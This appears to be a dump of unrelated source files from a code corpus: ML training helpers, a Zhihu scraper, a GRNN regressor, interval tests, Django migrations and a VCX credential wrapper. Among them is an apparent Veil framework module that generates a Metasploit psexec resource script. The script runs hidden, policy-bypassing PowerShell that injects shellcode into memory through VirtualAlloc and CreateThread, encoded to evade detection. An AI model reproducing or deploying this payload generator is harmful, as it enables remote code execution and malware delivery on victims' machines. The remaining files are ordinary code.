Xn = emptyMatrix( (len(negIdx),negFeat[0].shape[1]) )
k = 0
for i in range(len(posFeat)):
Xp[k:k+posFeat[i].shape[0],:] = posFeat[i]
k = k + posFeat[i].shape[0]
k = 0
for i in range(len(negFeat)):
Xn[k:k+negFeat[i].shape[0],:] = negFeat[i]
k = k + negFeat[i].shape[0]
print 'NegFromPos ready:',len(negIdx)
return {'posIdx':posIdx, 'posFeat':Xp, 'negIdx':negIdx, 'negFeat':Xn}
###############################################
# Cross-validation evaluation
###############################################
def reportCrossValidationPerformance(clf,X,Y):
from sklearn import cross_validation
import sklearn.metrics as met
skf = cross_validation.StratifiedKFold(Y, n_folds=10)
p,r = 0.0,0.0
for train_index, test_index in skf:
X_train, X_test = X[train_index], X[test_index]
Y_train, Y_test = Y[train_index], Y[test_index]
clf.fit(X_train,Y_train)
# Performance measures:
pred = clf.predict(X_test)
cfm = met.confusion_matrix(Y_test,pred)
precision = float(cfm[1][1])/(cfm[1][1] + cfm[0][1])
recall = float(cfm[1][1])/(cfm[1][1] + cfm[1][0])
p += precision
r += recall
print '{:.4f} {:.4f}'.format(precision,recall)
print cfm
print 'AVG {:.4f} {:.4f}'.format(p/10.0, r/10.0)
###############################################
# Load Hard Negatives from predefined list
###############################################
class LoadHardNegatives():
def __init__(self,boxInfo):
self.boxInfo = boxInfo
def run(self,img,features,bboxes):
wanted = set([ ':'.join(map(str,x)) for x in self.boxInfo[img] ])
candidates = []
imgList = []
box = []
for i in range(len(bboxes)):
b = bboxes[i]
boxHash = ':'.join(b[1:])
if boxHash in wanted:
candidates.append(True)
imgList.append(img)
box.append(b)
wanted.remove(boxHash)
else:
candidates.append(False)
candidates = np.asarray(candidates)
return (features[candidates],imgList,box)
def loadHardNegativesFromList(featuresDir,negativesInfo,featuresExt,numFeatures,totalNegatives,idx=False):
i = 0
task = LoadHardNegatives(negativesInfo)
result = dp.processData(negativesInfo.keys(),featuresDir,featuresExt,task)
hardng = emptyMatrix([totalNegatives,numFeatures])
hardNames = []
boxes = []
while len(result) > 0:
data,imgs,box = result.pop(0)
hardng[i:i+data.shape[0],:] = data
hardNames += imgs
boxes += box
i = i + data.shape[0]
return (hardng[0:i,:],boxes)
def parseRankedDetectionsFile(detectionsLog,maxNegOverlap,maxNegativeVectors):
## Read ranked list of negatives
if isinstance(detectionsLog, basestring):
log = [x.split() for x in open(detectionsLog)]
else:
log = detectionsLog
posExamples = dict()
negExamples = dict()
posCount,negCount,noCares,negTaken = 0,0,0,0
for l in log:
if l[7] == '1':
posCount += 1
try:
posExamples[l[0]] += [ l[1:5] ]
except:
posExamples[l[0]] = [ l[1:5] ]
elif l[7] == '0' and float(l[6]) <= maxNegOverlap:
negCount += 1
if negCount < maxNegativeVectors:
negTaken += 1
try:
negExamples[l[0]] += [ l[1:5] ]
except:
negExamples[l[0]] = [ l[1:5] ]
else:
noCares += 1
print 'NEGEXAMPLES:',np.sum( [len(negExamples[i]) for i in negExamples.keys()] )
print 'Log Of Detections: Pos {:} Neg {:} NoCares {:}'.format(posCount,negCount,noCares)
return {'posExamples':posExamples,'negExamples':negExamples,'negTaken':negTaken}
###############################################
# Compute aspect ratio and size features
###############################################
def addAspectRatioAndSizeFeatures(features,index,aspectRatios,objectSizes):
fs = 12
boxes = np.asmatrix( [ map(float,x[1:]) for x in index] )
imgSize = np.max(boxes,axis=0)[0,2:]
sizes = np.asarray(boxes[:,2]-boxes[:,0])*np.asarray(boxes[:,3]-boxes[:,1])/(500*500) #/(imgSize[0,0]*imgSize[0,1])
sizeF = np.tile(sizes, (1, fs)) - np.tile(objectSizes,(sizes.shape[0],1))
ratios = np.asarray(boxes[:,2]-boxes[:,0])/np.asarray(boxes[:,3]-boxes[:,1])
ratioF = np.tile(ratios, (1, fs)) - np.tile(aspectRatios,(sizes.shape[0],1))
# **
S = np.argsort(np.abs(sizeF),axis=1)
R = np.argsort(np.abs(ratioF),axis=1)
for i in range(len(S)):
sizeF[ i, S[i] ] = [1.,.5,.25,.125,.0625,0.,0.,0.,0.,0.,0.,0.]
ratioF[i, R[i] ] = [1.,.5,.25,.125,.0625,0.,0.,0.,0.,0.,0.,0.]
# **
return np.concatenate( (features, sizeF, ratioF), axis=1 )
def computeAspectRatioAndSizeIntervals(index):
boxes = np.asmatrix( [ map(float,x[1:]) for x in index] )
imgSize = np.max(boxes,axis=0)[0,2:]
sizes = np.asarray(boxes[:,2]-boxes[:,0])*np.asarray(boxes[:,3]-boxes[:,1])/(500*500) #/(imgSize[0,0]*imgSize[0,1])
objectSizes = np.percentile(sizes,range(5,100,10))
ratios = np.asarray(boxes[:,2]-boxes[:,0])/np.asarray(boxes[:,3]-boxes[:,1])
aspectRatios = np.percentile(ratios,range(5,100,10))
# **
objectSizes = [objectSizes[0]*0.5] + objectSizes + [1.0]
aspectRatios = [aspectRatios[0]*0.5] + aspectRatios + [aspectRatios[-1]*1.5]
# **
print 'AspectRatios:',aspectRatios
print 'ObjectSizes:',objectSizes
return aspectRatios,objectSizes
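# Example for the cross-validation helper above (a sketch with synthetic
# data; assumes scikit-learn is installed):
#   from sklearn.svm import LinearSVC
#   X = np.random.rand(100, 4096)
#   Y = np.concatenate((np.ones(50), np.zeros(50)))
#   reportCrossValidationPerformance(LinearSVC(C=1.0), X, Y)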
| mit | 583,949,107,760,448,000 | 33.886288 | 117 | 0.615377 | false |
lishubing/zhihu-py3 | zhihu/topic.py | 1 | 3749 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = '7sDream'
from .common import *
class Topic:
"""答案类,请使用``ZhihuClient.topic``方法构造对象."""
@class_common_init(re_topic_url)
def __init__(self, url, name=None, session=None):
"""创建话题类实例.
:param url: 话题url
:param name: 话题名称,可选
:return: Topic
"""
self.url = url
self._session = session
self._name = name
def _make_soup(self):
if self.soup is None:
self.soup = BeautifulSoup(self._session.get(self.url).content)
@property
@check_soup('_name')
def name(self):
"""获取话题名称.
:return: 话题名称
:rtype: str
"""
return self.soup.find('h1').text
@property
@check_soup('_follower_num')
def follower_num(self):
"""获取话题关注人数.
:return: 关注人数
:rtype: int
"""
follower_num_block = self.soup.find(
'div', class_='zm-topic-side-followers-info')
# when nobody follows the topic the block is missing, so return 0 directly (thanks to Zhihu user 段晓晨 for reporting this)
if follower_num_block.strong is None:
return 0
return int(follower_num_block.strong.text)
@property
@check_soup('_photo_url')
def photo_url(self):
"""获取话题头像图片地址.
:return: 话题头像url
:rtype: str
"""
if self.soup is not None:
img = self.soup.find('a', id='zh-avartar-edit-form').img['src']
return img.replace('_m', '_r')
@property
@check_soup('_description')
def description(self):
"""获取话题描述信息.
:return: 话题描述信息
:rtype: str
"""
if self.soup is not None:
desc = self.soup.find('div', class_='zm-editable-content').text
return desc
@property
@check_soup('_top_answers')
def top_answers(self):
"""获取话题下的精华答案.
:return: 话题下的精华答案,返回生成器.
:rtype: Answer.Iterable
"""
from .question import Question
from .answer import Answer
from .author import Author
if self.url is None:
return
for page_index in range(1, 50):
html = self._session.get(
self.url + 'top-answers?page=' + str(page_index)).text
soup = BeautifulSoup(html)
if soup.find('div', class_='error') is not None:
return
questions = soup.find_all('a', class_='question_link')
answers = soup.find_all(
'a', class_=re.compile(r'answer-date-link.*'))
authors = soup.find_all('h3', class_='zm-item-answer-author-wrap')
upvotes = soup.find_all('a', class_='zm-item-vote-count')
for ans, up, q, au in zip(answers, upvotes, questions, authors):
answer_url = Zhihu_URL + ans['href']
question_url = Zhihu_URL + q['href']
question_title = q.text
upvote = int(up['data-votecount'])
question = Question(question_url, question_title,
session=self._session)
if au.text == '匿名用户':
author = Author(None, name='匿名用户', session=self._session)
else:
author_url = Zhihu_URL + au.a['href']
author = Author(author_url, session=self._session)
yield Answer(answer_url, question, author, upvote,
session=self._session)
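# Usage sketch (network access and a logged-in session are assumed; the URL
# is a placeholder):
#   client = ZhihuClient('cookies.json')
#   topic = client.topic('http://www.zhihu.com/topic/19552832/')
#   print(topic.name, topic.follower_num)
#   for answer in topic.top_answers:
#       print(answer.url)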
| mit | 1,154,990,247,466,391,800 | 28.615385 | 78 | 0.516883 | false |
gems-uff/noworkflow | capture/noworkflow/now/ipython/__init__.py | 1 | 1194 | # Copyright (c) 2016 Universidade Federal Fluminense (UFF)
# Copyright (c) 2016 Polytechnic Institute of New York University.
# This file is part of noWorkflow.
# Please, consult the license terms in the LICENSE file.
"""IPython Module"""
from __future__ import (absolute_import, print_function,
division)
from ..persistence.models import * # pylint: disable=wildcard-import
from ..persistence import persistence_config, relational, content
def init(path=None, ipython=None):
"""Initiate noWorkflow extension.
Load D3, IPython magics, and connect to database
Keyword Arguments:
path -- database path (default=current directory)
ipython -- IPython object (default=None)
"""
import os
from .magics import register_magics
try:
from .hierarchymagic import load_ipython_extension as load_hierarchy
load_hierarchy(ipython)
except ImportError:
print("Warning: Sphinx is not installed. Dot "
"graphs won't work")
register_magics(ipython)
if path is None:
path = os.getcwd()
persistence_config.connect(path)
return u"ok"
| mit | -3,581,050,087,282,086,000 | 29.615385 | 114 | 0.659966 | false |
bartekbp/intelidzentaj | choregraphe-dir/personRecognizerProxy.py | 1 | 2453 | import httplib
import random
import string
import mimetypes
import urllib2
def random_string(length):
return ''.join(random.choice(string.letters) for _ in range(length))
def encode_multipart_data(data, files, binary):
boundary = random_string(30)
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def encode_field(field_name):
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"' % field_name,
'', str(data[field_name]))
def encode_file(field_name):
filename = files[field_name]
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"; filename="%s"' % (field_name, filename),
'Content-Type: %s' % get_content_type(filename),
'', open(filename, 'rb').read())
def encode_binary(field_name):
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"; filename="%s"' % (field_name, field_name),
'Content-Type: image/jpeg',
'', binary[field_name])
lines = []
for name in data:
lines.extend(encode_field(name))
for name in files:
lines.extend(encode_file(name))
for name in binary:
lines.extend(encode_binary(name))
lines.extend(('--%s--' % boundary, ''))
body = '\r\n'.join(lines)
headers = {'content-type': 'multipart/form-data; boundary=' + boundary,
'content-length': str(len(body))}
return body, headers
def send_post(url, data, files, binary):
req = urllib2.Request(url)
connection = httplib.HTTPConnection(req.get_host())
connection.request('POST', req.get_selector(),
*encode_multipart_data(data, files, binary))
response = connection.getresponse()
if response.status != 200:
return "bad response code"
return response.read()
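# Usage sketch (hypothetical endpoint and file paths):
#   send_post('http://localhost:8080/recognize', {'user': '42'},
#             {'photo': 'face.jpg'}, {})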
class PersonRecognizerProxy(object):
def __init__(self, address):
self.address = address
def recognize_person(self, image):
return send_post(self.address, {}, {}, {"img":image})
"""
import personRecognizerProxy
personRec = personRecognizerProxy.PersonRecognizerProxy("")
"""
| mit | -1,507,222,798,856,588,800 | 29.050633 | 102 | 0.576845 | false |
google/dl_bounds | dl_bounds/src/experiments/exp_sharpness.py | 1 | 3102 | # coding=utf-8
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements experimental logic."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from dl_bounds.src.data import LocalDatasetProvider
from dl_bounds.src.experiments.exp_base import Experiment
import numpy as np
import tensorflow as tf
class SharpnessExperiment(Experiment):
"""Computes sharpness complexity measure.
Sharpness described in:
N. S. Keskar, D. Mudigere, J. Nocedal, M. Smelyanskiy,
and P. T. P. Tang. On large-batch training
for deep learning: Generalization gap and sharp minima.
In ICLR 2017.
"""
def run(self):
"""Runs experiment."""
if self.exists():
tf.logging.info("Result file already exists.")
return
(x_train, y_train, x_val, y_val, _) = self.get_data()
m = x_train.shape[0]
tf.logging.info("Training set size = %d", m)
tf.logging.info("Val set size = %d", x_val.shape[0])
train_dataset = LocalDatasetProvider(
x_train, y_train, shuffle_seed=self.conf.data_shuffle_seed)
val_dataset = LocalDatasetProvider(
x_val, y_val, shuffle_seed=self.conf.data_shuffle_seed)
sharpness_dataset = LocalDatasetProvider(
x_train, y_train, shuffle_seed=self.conf.data_shuffle_seed)
n_records = self.get_n_records()
# Constants as in the paper describing sharpness measure
alpha_range = [5e-4, 1e-3, 1e-2]
n_alpha = len(alpha_range)
sharpness = np.zeros((n_records, n_alpha))
tf.logging.info("Computing sharpness on alpha=%s", ", ".join(
map(str, alpha_range)))
for (pass_index, (p, model)) in enumerate(self.train(train_dataset)):
self.measure_on_train_val(train_dataset, val_dataset, pass_index, p,
model)
self.report_train_val(pass_index)
for (i_alpha, alpha) in enumerate(alpha_range):
sharpness[pass_index, i_alpha] = model.sharpness(
sharpness_dataset,
batch_size=self.conf.batch_size,
learning_rate=self.conf.learning_rate,
init_stddev=self.conf.init_stddev,
passes=10,
optimizer=self.conf.optimizer,
alpha=alpha)
tf.logging.info(
"Sharpness (alpha=%s): %s", alpha,
", ".join(
["%.2f" % x for x in sharpness[:pass_index+1, i_alpha]]))
results = self.get_train_val_measurements()
results.update(dict(sharpness=sharpness, alpha=alpha_range))
self.save(results)
return results
| apache-2.0 | -123,532,413,234,264,400 | 32.717391 | 74 | 0.661186 | false |
kvesteri/intervals | tests/interval/test_coercion.py | 1 | 1457 | from infinity import inf
from pytest import mark, raises
from intervals import IntInterval
@mark.parametrize(('interval', 'string'), (
((1, 3), '(1, 3)'),
([1, 1], '[1, 1]'),
([1, inf], '[1,]')
))
def test_str_representation(interval, string):
assert str(IntInterval(interval)) == string
@mark.parametrize(
('number_range', 'empty'),
(
(IntInterval((2, 3)), True),
(IntInterval([2, 3]), False),
(IntInterval([2, 2]), False),
(IntInterval.from_string('[2, 2)'), True),
(IntInterval.from_string('(2, 2]'), True),
(IntInterval.from_string('[2, 3)'), False),
(IntInterval((2, 10)), False),
)
)
def test_bool(number_range, empty):
assert bool(IntInterval(number_range)) != empty
@mark.parametrize(
('number_range', 'coerced_value'),
(
([5, 5], 5),
([2, 2], 2),
)
)
def test_int_with_single_point_interval(number_range, coerced_value):
assert int(IntInterval(number_range)) == coerced_value
@mark.parametrize(
('number_range'),
(
'[2, 2)',
'(2, 2]',
)
)
def test_int_with_empty_interval(number_range):
with raises(TypeError):
int(IntInterval.from_string(number_range))
@mark.parametrize(
('number_range'),
(
[2, 4],
[2, 5],
)
)
def test_int_with_interval_containing_multiple_points(number_range):
with raises(TypeError):
int(IntInterval(number_range))
| bsd-3-clause | -7,794,547,078,260,103,000 | 21.765625 | 69 | 0.573782 | false |
itdxer/neupy | neupy/algorithms/rbfn/grnn.py | 1 | 4647 | from numpy import dot
from neupy.utils import format_data
from neupy.exceptions import NotTrained
from neupy.core.properties import BoundedProperty
from neupy.algorithms.base import BaseSkeleton
from .utils import pdf_between_data
__all__ = ('GRNN',)
class GRNN(BaseSkeleton):
"""
Generalized Regression Neural Network (GRNN). Network applies
only to the regression problems.
Parameters
----------
std : float
Standard deviation for PDF function.
        If your input features have high values, then the standard
        deviation should also be high. For instance, if input features
        are in the range ``[0, 20]``, the standard deviation should
        also be a big value like ``10`` or ``15``. Small values will
        lead to bad predictions.
{Verbose.verbose}
Notes
-----
    - The GRNN network is sensitive to cases where one input feature
      has much higher values than another. Input data has to be
      normalized before training.
    - The standard deviation has to match the range of the input features.
      Check the ``std`` parameter description for more information.
    - The bigger the training dataset, the slower the prediction.
      The algorithm is much more efficient for small datasets.
    - The network uses lazy learning, which means that it doesn't
      need iterative training. It just stores the parameters
      and uses them to make predictions.
Methods
-------
train(X_train, y_train, copy=True)
Network just stores all the information about the data and use
it for the prediction. Parameter ``copy`` copies input data
before saving it inside the network.
predict(X)
Return prediction per each sample in the ``X``.
{BaseSkeleton.fit}
Examples
--------
>>> import numpy as np
>>> from sklearn import datasets, preprocessing
>>> from sklearn.model_selection import train_test_split
>>> from neupy import algorithms
>>>
>>> dataset = datasets.load_diabetes()
>>> x_train, x_test, y_train, y_test = train_test_split(
... preprocessing.minmax_scale(dataset.data),
... preprocessing.minmax_scale(dataset.target.reshape(-1, 1)),
... test_size=0.3,
... )
>>>
>>> nw = algorithms.GRNN(std=0.1, verbose=False)
>>> nw.train(x_train, y_train)
>>>
>>> y_predicted = nw.predict(x_test)
>>> mse = np.mean((y_predicted - y_test) ** 2)
>>> mse
0.05280970704568171
"""
std = BoundedProperty(minval=0)
def __init__(self, std, verbose=False):
self.std = std
self.X_train = None
self.y_train = None
super(GRNN, self).__init__(verbose=verbose)
def train(self, X_train, y_train, copy=True):
"""
        Trains network. GRNN doesn't actually train; it just stores the
        input data and uses it for prediction.
Parameters
----------
X_train : array-like (n_samples, n_features)
y_train : array-like (n_samples,)
Target variable should be vector or matrix
with one feature column.
copy : bool
If value equal to ``True`` than input matrices will
be copied. Defaults to ``True``.
Raises
------
ValueError
In case if something is wrong with input data.
"""
X_train = format_data(X_train, copy=copy)
y_train = format_data(y_train, copy=copy)
if y_train.shape[1] != 1:
raise ValueError("Target value must be one dimensional array")
self.X_train = X_train
self.y_train = y_train
if X_train.shape[0] != y_train.shape[0]:
raise ValueError("Number of samples in the input and target "
"datasets are different")
def predict(self, X):
"""
Make a prediction from the input data.
Parameters
----------
X : array-like (n_samples, n_features)
Raises
------
ValueError
In case if something is wrong with input data.
Returns
-------
array-like (n_samples,)
"""
if self.X_train is None:
raise NotTrained(
"Cannot make a prediction. Network hasn't been trained yet")
X = format_data(X)
if X.shape[1] != self.X_train.shape[1]:
raise ValueError(
"Input data must contain {0} features, got {1}"
"".format(self.X_train.shape[1], X.shape[1]))
ratios = pdf_between_data(self.X_train, X, self.std)
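        # Nadaraya-Watson style estimate: each training target is weighted
        # by the Gaussian kernel density between its sample and the query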
return (dot(self.y_train.T, ratios) / ratios.sum(axis=0)).T
| mit | 109,408,013,141,987,840 | 29.572368 | 76 | 0.596944 | false |
ITOO-UrFU/open-programs | open_programs/apps/programs/migrations/0001_initial.py | 1 | 12004 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-02 09:11
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('competences', '__first__'),
('persons', '0001_initial'),
('modules', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ChoiceGroup',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование группы выбора')),
('labor', models.IntegerField(default=3, verbose_name='Трудоёмкость группы')),
('number', models.IntegerField(verbose_name='Номер группы выбора')),
],
options={
'verbose_name': 'группа выбора',
'verbose_name_plural': 'группы выбора',
},
),
migrations.CreateModel(
name='ChoiceGroupType',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование типы группы выбора')),
],
options={
'verbose_name': 'тип группы выбора',
'verbose_name_plural': 'типы группы выбора',
},
),
migrations.CreateModel(
name='LearningPlan',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('uni_displayableTitle', models.CharField(blank=True, max_length=32, null=True, verbose_name='Версия')),
('uni_number', models.CharField(blank=True, max_length=32, null=True, verbose_name='Номер УП')),
('uni_active', models.CharField(blank=True, max_length=32, null=True, verbose_name='Текущая версия')),
('uni_title', models.CharField(blank=True, max_length=32, null=True, verbose_name='Название')),
('uni_stage', models.BooleanField(default=True, verbose_name='План утверждён')),
('uni_loadTimeType', models.CharField(blank=True, max_length=32, null=True, verbose_name='Единица измерения нагрузки')),
('uni_html', models.TextField(blank=True, null=True)),
],
options={
'verbose_name': 'учебный план',
'verbose_name_plural': 'учебные планы',
},
),
migrations.CreateModel(
name='Program',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('level', models.CharField(choices=[('b', 'бакалавриат'), ('m', 'магистратура'), ('s', 'специалитет')], default='b', max_length=1, verbose_name='Уровень программы')),
('title', models.CharField(default='', max_length=256, verbose_name='Наименование образовательной программы')),
('training_direction', models.CharField(default='', max_length=256, verbose_name='Направление подготовки')),
('chief', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='persons.Person', verbose_name='Руководитель образовательной программы')),
('competences', models.ManyToManyField(blank=True, to='competences.Competence')),
('learning_plans', models.ManyToManyField(blank=True, to='programs.LearningPlan')),
],
options={
'verbose_name': 'программа',
'verbose_name_plural': 'программы',
},
),
migrations.CreateModel(
name='ProgramCompetence',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование компетенции')),
('number', models.IntegerField(verbose_name='Номер компетенции')),
],
options={
'verbose_name': 'компетенция программы',
'verbose_name_plural': 'компетенции программы',
},
),
migrations.CreateModel(
name='ProgramModules',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('semester', models.PositiveIntegerField(blank=True, null=True)),
('choice_group', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroup')),
('competence', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='programs.ProgramCompetence')),
('module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='modules.Module')),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.Program')),
],
options={
'verbose_name': 'модуль программы',
'verbose_name_plural': 'модули программы',
},
),
migrations.CreateModel(
name='TargetModules',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('choice_group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroup')),
('program_module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ProgramModules')),
],
options={
'verbose_name': 'модуль цели',
'verbose_name_plural': 'модули цели',
},
),
migrations.CreateModel(
name='TrainingTarget',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=256, verbose_name='Наименование образовательной цели')),
('number', models.IntegerField(verbose_name='Порядковый номер цели')),
('program', models.ManyToManyField(to='programs.Program')),
],
options={
'verbose_name': 'образовательная цель',
'verbose_name_plural': 'образовательные цели',
},
),
migrations.AddField(
model_name='targetmodules',
name='target',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.TrainingTarget'),
),
migrations.AddField(
model_name='choicegroup',
name='choice_group_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroupType'),
),
migrations.AddField(
model_name='choicegroup',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.Program'),
),
]
| unlicense | -2,469,500,295,048,216,000 | 60.683616 | 189 | 0.588478 | false |
d3m3vilurr/Veil | modules/payloads/powershell/psPsexecVirtualAlloc.py | 1 | 2739 | """
Powershell method to inject inline shellcode.
Builds a metasploit .rc resource file to psexec the powershell command easily
Original concept from Matthew Graeber: http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
Note: the architecture independent invoker was developed independently from
https://www.trustedsec.com/may-2013/native-powershell-x86-shellcode-injection-on-64-bit-platforms/
Port to the msf resource file by @the_grayhound
"""
from modules.common import shellcode
from modules.common import helpers
class Stager:
def __init__(self):
# required
self.shortname = "PsexecVirtualAlloc"
self.description = "PowerShell VirtualAlloc method for inline shellcode injection that makes a Metasploit psexec_command .rc script"
self.rating = "Excellent"
self.language = "powershell"
self.extension = "rc"
self.shellcode = shellcode.Shellcode()
def psRaw(self):
Shellcode = self.shellcode.generate()
Shellcode = ",0".join(Shellcode.split("\\"))[1:]
baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (Shellcode)
return baseString
def generate(self):
encoded = helpers.deflate(self.psRaw())
rcScript = "use auxiliary/admin/smb/psexec_command\n"
rcScript += "set COMMAND "
rcScript += "if %PROCESSOR_ARCHITECTURE%==x86 ("
rcScript += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\"" % (encoded)
rcScript += ") else ("
rcScript += "%%WinDir%%\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\")" % (encoded)
return rcScript
| gpl-3.0 | 6,437,733,450,173,481,000 | 45.423729 | 411 | 0.706462 | false |
Artemkaaas/indy-sdk | vcx/wrappers/python3/vcx/api/issuer_credential.py | 1 | 17127 | from ctypes import *
from vcx.common import do_call, create_cb
from vcx.api.connection import Connection
from vcx.api.vcx_stateful import VcxStateful
import json
class IssuerCredential(VcxStateful):
"""
The object of the VCX API representing an Issuer side in the credential issuance process.
Assumes that pairwise connection between Issuer and Holder is already established.
# State
The set of object states and transitions depends on communication method is used.
The communication method can be specified as config option on one of *_init function. The default communication method us `proprietary`.
proprietary:
VcxStateType::VcxStateInitialized - once `vcx_issuer_create_credential` (create IssuerCredential object) is called.
VcxStateType::VcxStateOfferSent - once `vcx_issuer_send_credential_offer` (send `CRED_OFFER` message) is called.
VcxStateType::VcxStateRequestReceived - once `CRED_REQ` messages is received.
use `vcx_issuer_credential_update_state` or `vcx_issuer_credential_update_state_with_message` functions for state updates.
VcxStateType::VcxStateAccepted - once `vcx_issuer_send_credential` (send `CRED` message) is called.
aries:
VcxStateType::VcxStateInitialized - once `vcx_issuer_create_credential` (create IssuerCredential object) is called.
VcxStateType::VcxStateOfferSent - once `vcx_issuer_send_credential_offer` (send `CredentialOffer` message) is called.
VcxStateType::VcxStateRequestReceived - once `CredentialRequest` messages is received.
VcxStateType::None - once `ProblemReport` messages is received.
